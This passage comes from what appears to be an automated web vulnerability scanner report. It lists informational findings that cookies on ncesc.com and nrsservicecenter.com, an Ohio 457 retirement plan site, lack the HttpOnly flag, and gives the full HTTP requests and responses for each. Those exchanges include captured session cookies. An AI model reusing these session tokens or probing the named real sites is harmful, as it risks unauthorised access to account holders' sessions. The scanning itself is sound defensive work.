Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.michigan.org&SiteLanguage=1033; path=/
Set-Cookie: EktGUID=71095b1f-aa36-4971-b401-2698abb68934; expires=Mon, 30-Apr-2012 12:38:51 GMT; path=/
Set-Cookie: EkAnalytics=newuser; expires=Mon, 30-Apr-2012 12:38:51 GMT; path=/
Set-Cookie: ASP.NET_SessionId=fiob233tvo1z5sfjfwmwrz55; path=/; HttpOnly
Set-Cookie: tm_city=; path=/
Set-Cookie: tm_int=; path=/
Set-Cookie: lm=sf; path=/
Set-Cookie: mcid=2096; path=/
Set-Cookie: mpid=2096; path=/
Set-Cookie: msid=; path=/
Set-Cookie: mtid=; path=/
Set-Cookie: ck=y; path=/
Set-Cookie: tm_event_dt=; path=/
Set-Cookie: tm_event_end_dt=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 111219


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style type="text/css"
...[SNIP]...

14.601. http://www.ncesc.com/lmi/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ncesc.com
Path:   /lmi/default.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lmi/default.asp HTTP/1.1
Host: www.ncesc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Set-Cookie: ARPT=YZQJJVS172.17.100.224CKOOW; path=/
Content-Length: 161
Content-Type: text/html
Location: https://www.ncesc1.com/LMI/default.asp
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 12:39:21 GMT
Connection: close

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="https://www.ncesc1.com/LMI/default.asp">here</a></body>

14.602. https://www.nrsservicecenter.com/content/media/retail/css/dcdweb/Ohio457-site.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /content/media/retail/css/dcdweb/Ohio457-site.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/media/retail/css/dcdweb/Ohio457-site.css HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: https://www.nrsservicecenter.com/iApp/ret/content/landing.do?Role=None&Site=Ohio457
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTHID=2B79DD6E72C9107208B8A4861F3DF71F; TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:28:38 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=2CDEE64A72C910722281D874740EB2E6; Path=/; Domain=.nrsservicecenter.com
Last-Modified: Tue, 26 Apr 2011 20:14:52 GMT
ETag: "20c0b9-4221-fa0c6700"
Accept-Ranges: bytes
Content-Length: 16929
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/css

/*START Reset Styles*/html,body,div,span,object,iframe,h1,h2,h3,h4,h5,h6,p,blockquote,pre,abbr,address,cite,code,del,dfn,em,img,ins,kbd,q,samp,small,strong,var,b,i,dl,dt,dd,ol,ul,li,fieldset,form,labe
...[SNIP]...

14.603. https://www.nrsservicecenter.com/content/media/retail/css/dcdweb/base-style.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /content/media/retail/css/dcdweb/base-style.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/media/retail/css/dcdweb/base-style.css HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: https://www.nrsservicecenter.com/iApp/ret/content/landing.do?Role=None&Site=Ohio457
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTHID=2B79DD6E72C9107208B8A4861F3DF71F; TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:28:37 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=2C61FEFA72C910721065FD47DEDA6F26; Path=/; Domain=.nrsservicecenter.com
Last-Modified: Mon, 31 Jan 2011 14:30:56 GMT
ETag: "1181a9-1e-43892800"
Accept-Ranges: bytes
Content-Length: 30
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/css

/* INTENTIONALLY LEFT BLANK */

14.604. https://www.nrsservicecenter.com/content/media/retail/css/dcdweb/print.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /content/media/retail/css/dcdweb/print.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/media/retail/css/dcdweb/print.css HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: https://www.nrsservicecenter.com/iApp/ret/content/landing.do?Role=None&Site=Ohio457
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTHID=2B79DD6E72C9107208B8A4861F3DF71F; TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:28:38 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=2CD9DA4272C9107208B9A4861F3DF71F; Path=/; Domain=.nrsservicecenter.com
Last-Modified: Thu, 09 Jul 2009 14:10:28 GMT
ETag: "118209-4ab-6af43d00"
Accept-Ranges: bytes
Content-Length: 1195
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/css

#navigation,
#extra,
#help,
#viewPrintableCopyLink,
#buttons,
#primary-navigation,
#global-navigation,
#utility-navigation {
   display:none !important;
   }

* {
   overflow:visible !important;    
   bord
...[SNIP]...

14.605. https://www.nrsservicecenter.com/content/media/retail/images/AdTeasers/Ohio457/NewWelcomeBanner.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /content/media/retail/images/AdTeasers/Ohio457/NewWelcomeBanner.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/media/retail/images/AdTeasers/Ohio457/NewWelcomeBanner.jpg HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: https://www.nrsservicecenter.com/iApp/ret/content/landing.do?Role=None&Site=Ohio457
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457; TLTHID=2CDEE64A72C910722281D874740EB2E6

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:28:44 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=3007D26E72C9107208C1A4861F3DF71F; Path=/; Domain=.nrsservicecenter.com
Last-Modified: Thu, 24 Mar 2011 16:26:56 GMT
ETag: "11823c-d6ea-f221d400"
Accept-Ranges: bytes
Content-Length: 55018
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: image/jpeg

......Exif..II*...........................b...........j...(...........1.......r...2...........i.................
..'....
..'..Adobe Photoshop CS5 Macintosh.2011-03-24T16:26:56-04:00...........0220....
...[SNIP]...

14.606. https://www.nrsservicecenter.com/content/media/retail/images/Logos/Ohio457.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /content/media/retail/images/Logos/Ohio457.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/media/retail/images/Logos/Ohio457.gif HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: https://www.nrsservicecenter.com/iApp/ret/content/landing.do?Role=None&Site=Ohio457
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTHID=2B79DD6E72C9107208B8A4861F3DF71F; TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:28:38 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=2CD9FB4472C910721FE181E018D630EF; Path=/; Domain=.nrsservicecenter.com
Last-Modified: Fri, 07 Jul 2006 20:13:02 GMT
ETag: "248065-1958-7dd62f80"
Accept-Ranges: bytes
Content-Length: 6488
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..F....    
......YVW..........$.c$".......TK.......+!...IFG.............(#urs........$.ia.......}w............)%&.......,#856......|z{......ebcmjk....F>7$$....un.2).`X.>5". .!... ............wuup
...[SNIP]...

14.607. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/bgGrads/bgGradient.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /content/media/retail/images/Ohio457/bgGrads/bgGradient.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/media/retail/images/Ohio457/bgGrads/bgGradient.jpg HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: https://www.nrsservicecenter.com/iApp/ret/content/landing.do?Role=None&Site=Ohio457
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457; TLTHID=2CDEE64A72C910722281D874740EB2E6

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:28:42 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=2ED0E93072C910722284D874740EB2E6; Path=/; Domain=.nrsservicecenter.com
Last-Modified: Tue, 25 Jan 2011 14:40:55 GMT
ETag: "1780fa-477-b430ebc0"
Accept-Ranges: bytes
Content-Length: 1143
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: image/jpeg

......JFIF.....H.H.....hExif..II*...............>...........F...(...........1.......N.......H.......H.......Paint.NET v3.5.6.....C....................................................................C.
...[SNIP]...

14.608. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/bgGrads/bgGradientAcctLogin.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /content/media/retail/images/Ohio457/bgGrads/bgGradientAcctLogin.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/media/retail/images/Ohio457/bgGrads/bgGradientAcctLogin.jpg HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: https://www.nrsservicecenter.com/iApp/ret/content/landing.do?Role=None&Site=Ohio457
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457; TLTHID=2CDEE64A72C910722281D874740EB2E6

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:28:43 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=2F69EA9072C9107213D2B514D844AB71; Path=/; Domain=.nrsservicecenter.com
Last-Modified: Tue, 25 Jan 2011 16:52:24 GMT
ETag: "5c004-646-8a698200"
Accept-Ranges: bytes
Content-Length: 1606
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: image/jpeg

......Exif..II*.......1.......2...2.......P...i.......j.......Adobe Photoshop CS5 Macintosh.2011-01-25T16:52:24-05:00...........0220    .................................................Ducky.......d.....
...[SNIP]...

14.609. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/bgGrads/bgGradientHomeContentAreas.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /content/media/retail/images/Ohio457/bgGrads/bgGradientHomeContentAreas.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/media/retail/images/Ohio457/bgGrads/bgGradientHomeContentAreas.jpg HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: https://www.nrsservicecenter.com/iApp/ret/content/landing.do?Role=None&Site=Ohio457
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457; TLTHID=2CDEE64A72C910722281D874740EB2E6

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:28:44 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=300926FA72C91072228FD874740EB2E6; Path=/; Domain=.nrsservicecenter.com
Last-Modified: Tue, 25 Jan 2011 16:44:12 GMT
ETag: "1780fc-64e-6d162f00"
Accept-Ranges: bytes
Content-Length: 1614
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: image/jpeg

......Exif..II*.......1.......2...2.......P...i.......j.......Adobe Photoshop CS5 Macintosh.2011-01-25T16:44:12-05:00...........0220    .................................................Ducky.......d.....
...[SNIP]...

14.610. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/navTabs/tabLeft.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /content/media/retail/images/Ohio457/navTabs/tabLeft.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/media/retail/images/Ohio457/navTabs/tabLeft.gif HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: https://www.nrsservicecenter.com/iApp/ret/content/landing.do?Role=None&Site=Ohio457
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457; TLTHID=2CDEE64A72C910722281D874740EB2E6

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:28:42 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=2ED168B072C91072106DFD47DEDA6F26; Path=/; Domain=.nrsservicecenter.com
Last-Modified: Thu, 10 Mar 2011 17:28:09 GMT
ETag: "1780fe-279-2b481c40"
Accept-Ranges: bytes
Content-Length: 633
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..K...............................................................................................................................................................................................
...[SNIP]...

14.611. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/navTabs/tabRight.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /content/media/retail/images/Ohio457/navTabs/tabRight.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/media/retail/images/Ohio457/navTabs/tabRight.gif HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: https://www.nrsservicecenter.com/iApp/ret/content/landing.do?Role=None&Site=Ohio457
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457; TLTHID=2CDEE64A72C910722281D874740EB2E6

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:28:44 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=3017DBFA72C9107208C2A4861F3DF71F; Path=/; Domain=.nrsservicecenter.com
Last-Modified: Thu, 10 Mar 2011 17:28:01 GMT
ETag: "1780ff-5c5-2ace0a40"
Accept-Ranges: bytes
Content-Length: 1477
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..K...............................................................................................................................................................................................
...[SNIP]...

14.612. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/sprites/login-button.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /content/media/retail/images/Ohio457/sprites/login-button.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/media/retail/images/Ohio457/sprites/login-button.gif HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: https://www.nrsservicecenter.com/iApp/ret/content/landing.do?Role=None&Site=Ohio457
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457; TLTHID=2CDEE64A72C910722281D874740EB2E6

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:28:44 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=302A2BC072C910721079FD47DEDA6F26; Path=/; Domain=.nrsservicecenter.com
Last-Modified: Wed, 26 Jan 2011 20:14:05 GMT
ETag: "178101-13b-79877d40"
Accept-Ranges: bytes
Content-Length: 315
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a(......................................................................................................,....(...... .Y....4......Rt.W.DHB.$..pH.*.G."0.`>...H........H...t..v...z.n.....s.l0C!...
...[SNIP]...

14.613. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/sprites/login-lock.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /content/media/retail/images/Ohio457/sprites/login-lock.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/media/retail/images/Ohio457/sprites/login-lock.gif HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: https://www.nrsservicecenter.com/iApp/ret/content/landing.do?Role=None&Site=Ohio457
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457; TLTHID=2CDEE64A72C910722281D874740EB2E6

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:28:44 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=301B239672C910722137D51D41D1E762; Path=/; Domain=.nrsservicecenter.com
Last-Modified: Tue, 25 Jan 2011 16:29:01 GMT
ETag: "47001d-24d-36c96d40"
Accept-Ranges: bytes
Content-Length: 589
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a....|.b_d......ebg.........pmr.............|..............}.........................}y~...............JHN..mjo......zw{...xuzkhm.................^[a.......~.vsx............spu................
...[SNIP]...

14.614. https://www.nrsservicecenter.com/content/media/retail/js/wtlOhio.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /content/media/retail/js/wtlOhio.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/media/retail/js/wtlOhio.js HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: https://www.nrsservicecenter.com/iApp/ret/content/landing.do?Role=None&Site=Ohio457
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457; TLTHID=2CDEE64A72C910722281D874740EB2E6

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:28:42 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=2ED0072C72C910722131D51D41D1E762; Path=/; Domain=.nrsservicecenter.com
Last-Modified: Thu, 07 Oct 2010 15:11:19 GMT
ETag: "1f8dfc-522e-4e5db3c0"
Accept-Ranges: bytes
Content-Length: 21038
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: application/x-javascript

/* WebTrends SmartSource Data Collector Tag
   Version: 8.6.2
   Tag Builder Version: 3.0
   Created: 4/1/2009 5:35:05 PM
   Updated for double tagging
   State of Ohio Ohio457.org */

function WebT
...[SNIP]...

14.615. https://www.nrsservicecenter.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
